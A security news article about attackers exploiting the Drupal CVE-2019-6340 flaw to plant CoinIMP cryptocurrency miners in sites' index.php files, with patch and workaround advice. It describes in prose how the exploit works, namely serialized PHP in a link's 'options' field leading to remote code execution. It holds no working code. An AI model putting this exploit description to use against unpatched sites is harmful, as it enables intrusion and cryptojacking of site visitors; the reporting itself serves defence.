Cryptocurrency Miners Exploit Latest Drupal Flaw

Here's what a Drupal hack looks like: An attacker can exploit a Drupal flaw by using a POST command to submit a specially crafted link, even if the user is not authenticated, to remotely execute arbitrary code. (Source: Trend Micro)

Hackers wasted little time before trying to turn a "highly critical" vulnerability in the Drupal content management system to their advantage.

"We've found dozens of attack attempts aimed at dozens of websites that belong to our customers using this exploit, including sites in government and the financial services industry," Edi Kogan, a researcher at security firm Imperva, says in a blog post.

"There were a few interesting payloads in the most recent attacks," he adds. "One payload tries to inject a JavaScript cryptocurrency - monero and webchain - miner named CoinIMP into an attacked site's index.php file so that site visitors will run the mining script when they browse the site's main page, for the attacker's financial benefit."

Here's CoinIMP's client-side embedded script, which uses a key that's 64 characters in length. When used by an attacker, the attacker generates a key, using the CoinIMP control panel, and includes this key in their maliciously deployed mining script to receive they receive any cryptocurrency-mining proceeds. (Source: Imperva)

The index.php file is what gets first loaded whenever someone visits a website. Cryptocurrency mining malware, meanwhile, refers to any code that uses an infected system's CPUs to "mine" for cryptocurrency by solving computational challenges that build the virtual currency's blockchain in return for a potential reward (see: Malware Moves: Attackers Retool for Cryptocurrency Theft).

Critical Security Fixes

On Feb. 20, the project team behind the Drupal open source CMS software released security updates, warning that they patch a vulnerability, designated CVE-2019-6340, that attackers could use to remotely execute code and potentially take full control of a vulnerable system.

The Drupal project team recommends that all users immediately apply the updates. "Be sure to install any available security updates for contributed projects after updating Drupal core," the Drupal team says. "No core update is required for Drupal 7, but several Drupal 7 contributed modules do require updates."

Many Drupal users will need the update because the flaw exists in web services functionality. "The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest) module," Branden Lynch, a threat analyst at security firm Trend Micro, says in a blog post.

Researchers say the flaw is easy to exploit. "An attacker can submit a crafted link that references a type of shortcut and contains serialized PHP in the 'options' field for the link," Lynch says.

The link can be used to execute any command, "including downloading a web shell or establishing persistence on the target via malware or other means," he says. "All executed commands will inherit the privileges of the user running Drupal."

Mitigation Warning: Workarounds Aren't Foolproof

Lynch cautions that the exploit continues to work even for sites that have yet to install updates but have applied Drupal's recommended workarounds to at least mitigate the flaw. Those workarounds involve disabling all web services modules or else configuring services to not allow PUT, PATCH or POST requests to web services resources.

Even with such mitigations in place, "it is still possible to issue a GET request and therefore perform remote code execution, as was the case with the other HTTP methods," he warns.

Some other types of defenses, such as using web application firewalls, can block these types of attacks, he adds.

On Friday, less than 48 hours after Drupal released its latest security updates, independent security researcher Troy Mursch of Bad Packets Report warned that he had already seen numerous attackers scanning for Drupal sites that were vulnerable to CVE-2019-6340.

Popular Hacking Target

Following WordPress and Joomla, Drupal is the world's third most popular content management system, commanding 4 percent market share, according to W3Techs.com.

Given Drupal's wide installation base, Imperva's Kogan says the CMS remains a popular attack target. "As always, attacks followed soon after the exploit was published. So being up to date with security updates is a must," he says.

About the Author

Schwartz is an award-winning journalist with two decades of experience in magazines, newspapers and electronic media. He has covered the information security and privacy sector throughout his career. Before joining Information Security Media Group in 2014, where he now serves as the executive editor, DataBreachToday and for European news coverage, Schwartz was the information security beat reporter for InformationWeek and a frequent contributor to DarkReading, among other publications. He lives in Scotland.

Operation Success!

Risk Management Framework: Learn from NIST

From heightened risks to increased regulations, senior leaders at all levels are pressured to
improve their organizations' risk management capabilities. But no one is showing them how -
until now.

Learn the fundamentals of developing a risk management program from the man who wrote the book
on the topic: Ron Ross, computer scientist for the National Institute of Standards and
Technology. In an exclusive presentation, Ross, lead author of NIST Special Publication 800-37
- the bible of risk assessment and management - will share his unique insights on how to:

Understand the current cyber threats to all public and private sector organizations;

Develop a multi-tiered risk management approach built upon governance, processes and
information systems;

Enter your email address to reset your password

Already have anISMG account?

Forgot Your Password Message:

Contact Us

Already have anISMG account?

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing careersinfosecurity.eu, you agree to our use of cookies.